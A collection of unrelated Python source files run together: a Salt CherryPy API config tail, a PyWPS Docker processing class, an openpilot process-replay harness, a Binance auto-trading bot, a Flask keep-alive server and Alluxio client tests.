conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
container.py
|
##################################################################
# Copyright 2018 Open Source Geospatial Foundation and others #
# licensed under MIT, Please consult LICENSE.txt for details #
##################################################################
import os
import pywps.configuration as config
from pywps.processing.basic import Processing
from owslib.wps import WebProcessingService as WPS
from pywps.response.status import WPS_STATUS
from pywps.exceptions import NoAvailablePort
import docker
import socket
import time
import threading
from pywps.inout.basic import LiteralInput, ComplexInput, BBoxInput
import owslib
from pywps.dblog import store_status
import logging
LOGGER = logging.getLogger("PYWPS")
class ClientError:
pass
class Container(Processing):
def __init__(self, process, wps_request, wps_response):
super().__init__(process, wps_request, wps_response)
self.port = _assign_port()
self.client = docker.from_env()
self.cntnr = self._create()
if self.job.wps_request.store_execute == 'true' and self.job.wps_request.status == 'true':
self.job.process.async_ = True
else:
self.job.process.async_ = False
def _create(self):
cntnr_img = config.get_config_value("processing", "docker_img")
prcs_inp_dir = self.job.wps_response.process.workdir
prcs_out_dir = config.get_config_value("server", "outputpath")
dckr_inp_dir = config.get_config_value("processing", "dckr_inp_dir")
dckr_out_dir = config.get_config_value("processing", "dckr_out_dir")
container = self.client.containers.create(cntnr_img, ports={"5000/tcp": self.port}, detach=True,
volumes={prcs_out_dir: {'bind': dckr_out_dir, 'mode': 'rw'},
prcs_inp_dir: {'bind': dckr_inp_dir, 'mode': 'rw'}})
return container
def start(self):
self.cntnr.start()
# it takes some time to start the container
time.sleep(1)
self._execute()
if self.job.process.async_:
self._parse_status()
daemon = threading.Thread(target=check_status, args=(self,))
daemon.start()
else:
self._parse_outputs()
daemon = threading.Thread(target=self.dirty_clean)
daemon.start()
def stop(self):
self.cntnr.stop()
def cancel(self):
self.cntnr.kill()
def pause(self):
self.cntnr.pause()
def unpause(self):
self.cntnr.unpause()
def _execute(self):
url_execute = "http://localhost:{}/wps".format(self.port)
inputs = get_inputs(self.job.wps_request.inputs)
output = get_output(self.job.wps_request.outputs)
wps = WPS(url=url_execute, skip_caps=True)
self.execution = wps.execute(self.job.wps_request.identifier, inputs=inputs, output=output,
mode=self.job.process.async_)
def _parse_outputs(self):
for output in self.execution.processOutputs:
# TODO what if len(data) > 1 ??
if output.data:
self.job.wps_response.outputs[output.identifier].data = output.data[0]
if output.reference:
rp = output.reference[output.reference.index('outputs/'):]
self.job.wps_response.outputs[output.identifier].file = rp
self.job.wps_response.update_status_succeeded('PyWPS Process {} finished'.format(self.job.process.title))
store_status(self.job.wps_response.uuid, self.job.wps_response.status, self.job.wps_response.message)
def _parse_status(self):
container_status = self.execution.statusLocation.split("/outputs/")[-1]
status_url = self.job.process.status_url
local_status = status_url.split("/outputs/")[-1]
status_location = status_url.replace(local_status, container_status)
self.job.process.status_location = status_location
# self.job.process.status_location(self.job.process, status_location)
self.job.wps_response.update_status(message=self.execution.statusMessage)
def dirty_clean(self):
self.cntnr.stop()
self.cntnr.remove()
self.job.process.clean()
self.update_status()
def update_status(self):
self.job.wps_response.message = 'PyWPS Process {} finished'.format(self.job.process.title)
self.job.wps_response.percentage = 100
self.job.wps_response.status = WPS_STATUS.SUCCEEDED
store_status(self.job.wps_response.uuid, self.job.wps_response.status, self.job.wps_response.message,
self.job.wps_response.percentage)
def get_inputs(job_inputs):
"""
Return all inputs in [(input_name1, input_value1), (input_name2, input_value2)]
Return value can be used for WPS.execute method.
:return: input values
:rtype:list of tuples
"""
the_inputs = []
for key in job_inputs.keys():
inp = job_inputs[key][0]
if isinstance(inp, LiteralInput):
ows_inp = str(inp.data)
elif isinstance(inp, ComplexInput):
fp = os.path.basename(inp.file)
dckr_inp_dir = config.get_config_value('processing', 'dckr_inp_dir')
ows_inp = owslib.wps.ComplexDataInput("file://" + os.path.join(dckr_inp_dir, fp))
elif isinstance(inp, BBoxInput):
ows_inp = owslib.wps.BoundingBoxDataInput(inp.data)
else:
raise Exception
the_inputs.append((key, ows_inp))
return the_inputs
def get_output(job_output):
"""
Return all outputs name
Return value can be used for WPS.execute method.
:return: output names
:rtype:list
"""
the_output = []
for key in job_output.keys():
the_output.append((key, job_output[key]['asReference']))
return the_output
def _assign_port():
port_min = int(config.get_config_value("processing", "port_min"))
port_max = int(config.get_config_value("processing", "port_max"))
for port in range(port_min, port_max):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
res = sock.connect_ex(('127.0.0.1', port))
# TODO find better solution for errno
if res != 0:
return port
raise NoAvailablePort("No port from range {}-{} available.".format(port_min, port_max))
def check_status(container):
sleep_secs = int(config.get_config_value('processing', 'sleep_secs'))
while True:
container.execution.checkStatus(sleepSecs=sleep_secs)
if container.execution.isComplete():
container.dirty_clean()
break
|
process_replay.py
|
#!/usr/bin/env python3
import capnp
import os
import sys
import threading
import importlib
if "CI" in os.environ:
def tqdm(x):
return x
else:
from tqdm import tqdm # type: ignore
from cereal import car, log
from selfdrive.car.car_helpers import get_car
import selfdrive.manager as manager
import cereal.messaging as messaging
from common.params import Params
from cereal.services import service_list
from collections import namedtuple
# Numpy gives different results based on CPU features after version 19
NUMPY_TOLERANCE = 1e-7
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback', 'tolerance'])
def wait_for_event(evt):
if not evt.wait(15):
if threading.currentThread().getName() == "MainThread":
# tested process likely died. don't let test just hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
class DumbSocket:
def __init__(self, s=None):
if s is not None:
try:
dat = messaging.new_message(s)
except capnp.lib.capnp.KjException: # pylint: disable=c-extension-no-member
# lists
dat = messaging.new_message(s, 0)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services):
super(FakeSubMaster, self).__init__(services, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super(FakeSubMaster, self).update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services): # pylint: disable=super-init-not-called
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
try:
data = messaging.new_message(s)
except capnp.lib.capnp.KjException:
data = messaging.new_message(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['pathPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock):
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
# calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
# should_recv always true to increment frame
recv_socks = []
if msg.which() == 'carState' and ((fsm.frame + 1) % 25) == 0:
recv_socks = ["liveCalibration"]
return recv_socks, msg.which() == 'carState'
def paramsd_rcv_callback(msg, CP, cfg, fsm):
recv_socks = []
if msg.which() == 'carState' and ((fsm.frame + 2) % 5) == 0:
recv_socks = ["liveParameters"]
return recv_socks, msg.which() == 'carState'
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"thermal": [], "health": [], "liveCalibration": [], "dMonitoringState": [], "plan": [], "pathPlan": [], "gpsLocation": [], "liveLocationKalman": [],
"model": [], "frame": [],
},
ignore=["logMonoTime", "valid", "controlsState.startMonoTime", "controlsState.cumLagMs"],
init_callback=fingerprint,
should_recv_callback=None,
tolerance=None,
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "controlsState": [], "model": [],
},
ignore=["logMonoTime", "valid", "radarState.cumLagMs"],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"model": ["pathPlan"], "radarState": ["plan"],
"carState": [], "controlsState": [], "liveParameters": [],
},
ignore=["logMonoTime", "valid", "plan.processingDelay"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=None,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"carState": ["liveCalibration"],
"cameraOdometry": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="dmonitoringd",
pub_sub={
"driverState": ["dMonitoringState"],
"liveCalibration": [], "carState": [], "model": [], "gpsLocation": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="locationd",
pub_sub={
"cameraOdometry": ["liveLocationKalman"],
"sensorEvents": [], "gpsLocationExternal": [], "liveCalibration": [], "carState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="paramsd",
pub_sub={
"carState": ["liveParameters"],
"liveLocationKalman": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=paramsd_rcv_callback,
tolerance=NUMPY_TOLERANCE,
),
]
def replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
params = Params()
params.clear_all()
params.manager_start()
params.put("OpenpilotEnabledToggle", "1")
params.put("Passive", "0")
params.put("CommunityFeaturesToggle", "1")
os.environ['NO_RADAR_SLEEP'] = "1"
manager.prepare_managed_process(cfg.proc_name)
mod = importlib.import_module(manager.managed_processes[cfg.proc_name])
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock)
CP = car.CarParams.from_bytes(params.get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs):
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(0, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
|
Trading.py
|
# -*- coding: UTF-8 -*-
# @yasinkuyu
# Define Python imports
import os
import sys
import time
import config
import threading
import math
# Define Custom imports
from Database import Database
from Orders import Orders
class Trading():
# Define trade vars
order_id = 0
order_data = None
buy_filled = True
sell_filled = True
buy_filled_qty = 0
sell_filled_qty = 0
# percent (When you drop 10%, sell panic.)
stop_loss = 0
# Buy/Sell qty
quantity = 0
# BTC amount
amount = 0
# float(step_size * math.floor(float(free)/step_size))
step_size = 0
# Define static vars
WAIT_TIME_BUY_SELL = 1 # seconds
WAIT_TIME_CHECK_BUY_SELL = 0.2 # seconds
WAIT_TIME_CHECK_SELL = 5 # seconds
WAIT_TIME_STOP_LOSS = 20 # seconds
MAX_TRADE_SIZE = 7 # int
def __init__(self, option):
# Get argument parse options
self.option = option
# Define parser vars
self.order_id = self.option.orderid
self.quantity = self.option.quantity
self.wait_time = self.option.wait_time
self.stop_loss = self.option.stop_loss
self.increasing = self.option.increasing
self.decreasing = self.option.decreasing
# BTC amount
self.amount = self.option.amount
def buy(self, symbol, quantity, buyPrice):
# Do you have an open order?
self.check_order()
try:
# Create order
orderId = Orders.buy_limit(symbol, quantity, buyPrice)
# Database log
Database.write([orderId, symbol, 0, buyPrice, 'BUY', quantity, self.option.profit])
print('Buy order created id:%d, q:%.8f, p:%.8f' % (orderId, quantity, float(buyPrice)))
self.order_id = orderId
return orderId
except Exception as e:
print('bl: %s' % (e))
time.sleep(self.WAIT_TIME_BUY_SELL)
return None
def sell(self, symbol, quantity, orderId, sell_price, last_price):
'''
The specified limit will try to sell until it reaches.
If not successful, the order will be canceled.
'''
buy_order = Orders.get_order(symbol, orderId)
if buy_order['status'] == 'FILLED' and buy_order['side'] == 'BUY':
print('Buy order filled... Try sell...')
else:
time.sleep(self.WAIT_TIME_CHECK_BUY_SELL)
if buy_order['status'] == 'FILLED' and buy_order['side'] == 'BUY':
print('Buy order filled after 0.1 second... Try sell...')
elif buy_order['status'] == 'PARTIALLY_FILLED' and buy_order['side'] == 'BUY':
print('Buy order partially filled... Try sell... Cancel remaining buy...')
self.cancel(symbol, orderId)
else:
self.cancel(symbol, orderId)
print('Buy order fail (Not filled) Cancel order...')
self.order_id = 0
return
sell_order = Orders.sell_limit(symbol, quantity, sell_price)
sell_id = sell_order['orderId']
print('Sell order create id: %d' % sell_id)
time.sleep(self.WAIT_TIME_CHECK_SELL)
if sell_order['status'] == 'FILLED':
print('Sell order (Filled) Id: %d' % sell_id)
print('LastPrice : %.8f' % last_price)
print('Profit: %%%s. Buy price: %.8f Sell price: %.8f' % (self.option.profit, float(sell_order['price']), sell_price))
self.order_id = 0
self.order_data = None
return
'''
If all sales trials fail,
the grievance is stop-loss.
'''
if self.stop_loss > 0:
# If sell order failed after 5 seconds, 5 seconds more wait time before selling at loss
time.sleep(self.WAIT_TIME_CHECK_SELL)
if self.stop(symbol, quantity, sell_id, last_price):
if Orders.get_order(symbol, sell_id)['status'] != 'FILLED':
print('We apologize... Sold at loss...')
else:
print('We apologize... Cant sell even at loss... Please sell manually... Stopping program...')
self.cancel(symbol, sell_id)
exit(1)
while (sell_status != 'FILLED'):
time.sleep(self.WAIT_TIME_CHECK_SELL)
sell_status = Orders.get_order(symbol, sell_id)['status']
lastPrice = Orders.get_ticker(symbol)
print('Status: %s Current price: %.8f Sell price: %.8f' % (sell_status, lastPrice, sell_price))
print('Sold! Continue trading...')
self.order_id = 0
self.order_data = None
def stop(self, symbol, quantity, orderId, last_price):
# If the target is not reached, stop-loss.
stop_order = Orders.get_order(symbol, orderId)
stopprice = self.calc(float(stop_order['price']))
lossprice = stopprice - (stopprice * self.stop_loss / 100)
status = stop_order['status']
# Order status
if status == 'NEW' or status == 'PARTIALLY_FILLED':
if self.cancel(symbol, orderId):
# Stop loss
if last_price >= lossprice:
sello = Orders.sell_market(symbol, quantity)
print('Stop-loss, sell market, %s' % (last_price))
sell_id = sello['orderId']
if sello == True:
return True
else:
# Wait a while after the sale to the loss.
time.sleep(self.WAIT_TIME_STOP_LOSS)
statusloss = sello['status']
if statusloss != 'NEW':
print('Stop-loss, sold')
return True
else:
self.cancel(symbol, sell_id)
return False
else:
sello = Orders.sell_limit(symbol, quantity, lossprice)
print('Stop-loss, sell limit, %s' % (lossprice))
time.sleep(self.WAIT_TIME_STOP_LOSS)
statusloss = sello['status']
if statusloss != 'NEW':
print('Stop-loss, sold')
return True
else:
self.cancel(symbol, sell_id)
return False
else:
print('Cancel did not work... Might have been sold before stop loss...')
return True
elif status == 'FILLED':
self.order_id = 0
self.order_data = None
print('Order filled')
return True
else:
return False
def check(self, symbol, orderId, quantity):
# If profit is available and there is no purchase from the specified price, take it with the market.
# Do you have an open order?
self.check_order()
trading_size = 0
time.sleep(self.WAIT_TIME_BUY_SELL)
while trading_size < self.MAX_TRADE_SIZE:
# Order info
order = Orders.get_order(symbol, orderId)
side = order['side']
price = float(order['price'])
# TODO: Sell partial qty
orig_qty = float(order['origQty'])
self.buy_filled_qty = float(order['executedQty'])
status = order['status']
print('Wait buy order: %s id:%d, price: %.8f, orig_qty: %.8f' % (symbol, order['orderId'], price, orig_qty))
if status == 'NEW':
if self.cancel(symbol, orderId):
buyo = Orders.buy_market(symbol, quantity)
print('Buy market order')
self.order_id = buyo['orderId']
self.order_data = buyo
if buyo == True:
break
else:
trading_size += 1
continue
else:
break
elif status == 'FILLED':
self.order_id = order['orderId']
self.order_data = order
print('Filled')
break
elif status == 'PARTIALLY_FILLED':
print('Partial filled')
break
else:
trading_size += 1
continue
def cancel(self, symbol, orderId):
# If order is not filled, cancel it.
check_order = Orders.get_order(symbol, orderId)
if not check_order:
self.order_id = 0
self.order_data = None
return True
if check_order['status'] == 'NEW' or check_order['status'] != 'CANCELLED':
Orders.cancel_order(symbol, orderId)
self.order_id = 0
self.order_data = None
return True
def calc(self, lastBid):
try:
return lastBid + (lastBid * self.option.profit / 100)
except Exception as e:
print('c: %s' % (e))
return
def check_order(self):
# If there is an open order, exit.
if self.order_id > 0:
exit(1)
def action(self, symbol):
# Order amount
quantity = self.quantity
# Fetches the ticker price
lastPrice = Orders.get_ticker(symbol)
# Order book prices
lastBid, lastAsk = Orders.get_order_book(symbol)
# Target buy price, add little increase #87
buyPrice = lastBid + self.increasing
# Target sell price, decrease little
sellPrice = lastAsk - self.decreasing
# Spread ( profit )
profitableSellingPrice = self.calc(lastBid)
# Check working mode
if self.option.mode == 'range':
buyPrice = float(self.option.buyprice)
sellPrice = float(self.option.sellprice)
profitableSellingPrice = sellPrice
# Screen log
if self.option.prints and self.order_id == 0:
spreadPerc = (lastAsk/lastBid - 1) * 100.0
print('price:%.8f buyp:%.8f sellp:%.8f-bid:%.8f ask:%.8f spread:%.2f' % (lastPrice, buyPrice, profitableSellingPrice, lastBid, lastAsk, spreadPerc))
# analyze = threading.Thread(target=analyze, args=(symbol,))
# analyze.start()
if self.order_id > 0:
# Profit mode
if self.order_data is not None:
order = self.order_data;
# Last control
newProfitableSellingPrice = self.calc(float(order['price']))
if (lastAsk >= newProfitableSellingPrice):
profitableSellingPrice = newProfitableSellingPrice
# range mode
if self.option.mode == 'range':
profitableSellingPrice = self.option.sellprice
'''
If the order is complete,
try to sell it.
'''
# Perform buy action
sellAction = threading.Thread(target=self.sell, args=(symbol, quantity, self.order_id, profitableSellingPrice, lastPrice,))
sellAction.start()
return
'''
Did profit get caught
if ask price is greater than profit price,
buy with my buy price,
'''
if (lastAsk >= profitableSellingPrice and self.option.mode == 'profit') or \
(lastPrice <= float(self.option.buyprice) and self.option.mode == 'range'):
if self.order_id == 0:
self.buy(symbol, quantity, buyPrice)
# Perform check/sell action
# checkAction = threading.Thread(target=self.check, args=(symbol, self.order_id, quantity,))
# checkAction.start()
def logic(self):
return 0
def filters(self):
symbol = self.option.symbol
# Get symbol exchange info
symbol_info = Orders.get_info(symbol)
if not symbol_info:
print('Invalid symbol, please try again...')
exit(1)
symbol_info['filters'] = {item['filterType']: item for item in symbol_info['filters']}
return symbol_info
def format_step(self, quantity, stepSize):
return float(stepSize * math.floor(float(quantity)/stepSize))
def validate(self):
valid = True
symbol = self.option.symbol
filters = self.filters()['filters']
# Order book prices
lastBid, lastAsk = Orders.get_order_book(symbol)
lastPrice = Orders.get_ticker(symbol)
minQty = float(filters['LOT_SIZE']['minQty'])
minPrice = float(filters['PRICE_FILTER']['minPrice'])
minNotional = float(filters['MIN_NOTIONAL']['minNotional'])
quantity = float(self.option.quantity)
# stepSize defines the intervals that a quantity/icebergQty can be increased/decreased by.
stepSize = float(filters['LOT_SIZE']['stepSize'])
# tickSize defines the intervals that a price/stopPrice can be increased/decreased by
tickSize = float(filters['PRICE_FILTER']['tickSize'])
# If option increasing default tickSize greater than
if (float(self.option.increasing) < tickSize):
self.increasing = tickSize
# If option decreasing default tickSize greater than
if (float(self.option.decreasing) < tickSize):
self.decreasing = tickSize
# Just for validation
lastBid = lastBid + self.increasing
# Set static
# If quantity or amount is zero, minNotional increase 10%
quantity = (minNotional / lastBid)
quantity = quantity + (quantity * 10 / 100)
notional = minNotional
if self.amount > 0:
# Calculate amount to quantity
quantity = (self.amount / lastBid)
if self.quantity > 0:
# Format quantity step
quantity = self.quantity
quantity = self.format_step(quantity, stepSize)
notional = lastBid * float(quantity)
# Set Globals
self.quantity = quantity
self.step_size = stepSize
# minQty = minimum order quantity
if quantity < minQty:
print('Invalid quantity, minQty: %.8f (u: %.8f)' % (minQty, quantity))
valid = False
if lastPrice < minPrice:
print('Invalid price, minPrice: %.8f (u: %.8f)' % (minPrice, lastPrice))
valid = False
# minNotional = minimum order value (price * quantity)
if notional < minNotional:
print('Invalid notional, minNotional: %.8f (u: %.8f)' % (minNotional, notional))
valid = False
if not valid:
exit(1)
def run(self):
cycle = 0
actions = []
symbol = self.option.symbol
print('Auto Trading for Binance.com. @yasinkuyu')
print('\n')
# Validate symbol
self.validate()
print('Started...')
print('Trading Symbol: %s' % symbol)
print('Buy Quantity: %.8f' % self.quantity)
print('Stop-Loss Amount: %s' % self.stop_loss)
if self.option.mode == 'range':
if self.option.buyprice == 0 or self.option.sellprice == 0:
print('Please enter --buyprice / --sellprice\n')
exit(1)
print('Range Mode Options:')
print('\tBuy Price: %.8f', self.option.buyprice)
print('\tSell Price: %.8f', self.option.sellprice)
else:
print('Profit Mode Options:')
print('\tPreferred Profit: %0.2f%%' % self.option.profit)
print('\tBuy Price : (Bid+ --increasing %.8f)' % self.increasing)
print('\tSell Price: (Ask- --decreasing %.8f)' % self.decreasing)
print('\n')
while (cycle <= self.option.loop):
startTime = time.time()
actionTrader = threading.Thread(target=self.action, args=(symbol,))
actions.append(actionTrader)
actionTrader.start()
endTime = time.time()
if endTime - startTime < self.wait_time:
time.sleep(self.wait_time - (endTime - startTime))
# 0 = Unlimited loop
if self.option.loop > 0:
cycle = cycle + 1
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask("")
@app.route("/")
def home():
return "Hello, World! I am running"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
client_test.py
|
try:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
except ImportError:
from http.server import HTTPServer, BaseHTTPRequestHandler
import socket
from threading import Thread
import json
import random
import urllib
from urlparse import urlparse
import alluxio
from random_option import *
from random_wire import *
from util import random_str, random_int
def get_free_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(('localhost', 0))
address, port = s.getsockname()
s.close()
return port
def setup_client(handler):
host = 'localhost'
port = get_free_port()
print port
server = HTTPServer((host, port), handler)
server_thread = Thread(target=server.serve_forever)
server_thread.setDaemon(True)
server_thread.start()
client = alluxio.Client(host, port, timeout=60)
return client, lambda: server.shutdown
def handle_paths_request(request, path, action, params=None, input=None, output=None):
# Assert that URL path is expected.
expected_path = alluxio.client._paths_url_path(path, action)
if params is not None:
expected_path += '?'
for i, (k, v) in enumerate(params.items()):
if i != 0:
expected_path += '&'
expected_path += '{}={}'.format(k,
urllib.quote(v, safe=''))
assert request.path == expected_path
if input is not None:
# Assert that request body is expected.
content_len = int(request.headers.getheader('content-length', 0))
body = request.rfile.read(content_len)
assert json.loads(body) == input.json()
# Respond.
request.send_response(200)
if output is not None:
request.send_header('Content-Type', 'application/json')
request.end_headers()
request.wfile.write(json.dumps(output))
def paths_handler(path, action, params=None, input=None, output=None):
class _(BaseHTTPRequestHandler):
def do_POST(self):
handle_paths_request(self, path, action,
params=params, input=input, output=output)
return _
def test_create_directory():
path = '/foo'
option = random_create_directory()
client, cleanup = setup_client(paths_handler(
path, 'create-directory', input=option))
client.create_directory(path, option)
cleanup()
def test_create_file():
path = '/foo'
option = random_create_file()
expected_file_id = 1
client, cleanup = setup_client(paths_handler(
path, 'create-file', input=option, output=expected_file_id))
file_id = client.create_file(path, option)
cleanup()
assert file_id == expected_file_id
def test_delete():
path = '/foo'
option = random_delete()
client, cleanup = setup_client(paths_handler(path, 'delete', input=option))
client.delete(path, option)
cleanup()
def test_exists():
path = '/foo'
expected_output = True
client, cleanup = setup_client(paths_handler(
path, 'exists', output=expected_output))
output = client.exists(path)
cleanup()
assert output == expected_output
def test_free():
path = '/foo'
option = random_free()
client, cleanup = setup_client(paths_handler(path, 'free', input=option))
client.free(path, option)
cleanup()
def test_get_status():
path = '/foo'
expected_output = random_file_info()
client, cleanup = setup_client(paths_handler(
path, 'get-status', output=expected_output.json()))
output = client.get_status(path)
cleanup()
assert output == expected_output
def test_list_status():
path = '/foo'
option = random_list_status()
expected_file_infos = []
for _ in range(random.randint(1, 10)):
expected_file_infos.append(random_file_info())
expected_output = [info.json() for info in expected_file_infos]
expected_names = [info.name for info in expected_file_infos]
client, cleanup = setup_client(paths_handler(
path, 'list-status', input=option, output=expected_output))
infos = client.list_status(path, option)
names = client.ls(path, option)
cleanup()
expected_file_infos.sort()
assert infos == expected_file_infos
expected_names.sort()
assert names == expected_names
def test_mount():
path = '/foo'
src = random_str()
option = random_mount()
client, cleanup = setup_client(paths_handler(
path, 'mount', params={'src': src}, input=option))
client.mount(path, src, option)
cleanup()
def test_open_file():
path = '/foo'
expected_file_id = random_int()
option = random_open_file()
client, cleanup = setup_client(paths_handler(
path, 'open-file', input=option, output=expected_file_id))
file_id = client.open_file(path, option)
cleanup()
assert file_id == expected_file_id
def test_rename():
src = '/foo'
dst = '/bar'
client, cleanup = setup_client(
paths_handler(src, 'rename', params={'dst': dst}))
client.rename(src, dst)
cleanup()
def test_set_attribute():
option = random_set_attribute()
path = '/foo'
client, cleanup = setup_client(
paths_handler(path, 'set-attribute', input=option))
client.set_attribute(path, option)
cleanup()
def test_unmount():
path = '/foo'
client, cleanup = setup_client(paths_handler(path, 'unmount'))
client.unmount(path)
cleanup()
def handle_streams_request(request, file_id, action, input=None, output=None):
# Assert that URL path is expected.
expected_path = alluxio.client._streams_url_path(file_id, action)
assert request.path == expected_path
content_len = 0
if input is not None:
# Assert that request body is expected.
content_len = int(request.headers.getheader('content-length', 0))
body = request.rfile.read(content_len)
assert body == input
# Respond.
request.send_response(200)
if output is not None:
request.send_header('Content-Type', 'application/octet-stream')
request.end_headers()
request.wfile.write(output)
else:
request.send_header('Content-Type', 'application/json')
request.end_headers()
request.wfile.write(json.dumps(content_len))
def streams_handler(file_id, action, input=None, output=None):
class _(BaseHTTPRequestHandler):
def do_POST(self):
handle_streams_request(self, file_id, action,
input=input, output=output)
return _
def test_close():
file_id = random_int()
client, cleanup = setup_client(streams_handler(file_id, 'close'))
client.close(file_id)
cleanup()
def test_read():
file_id = random_int()
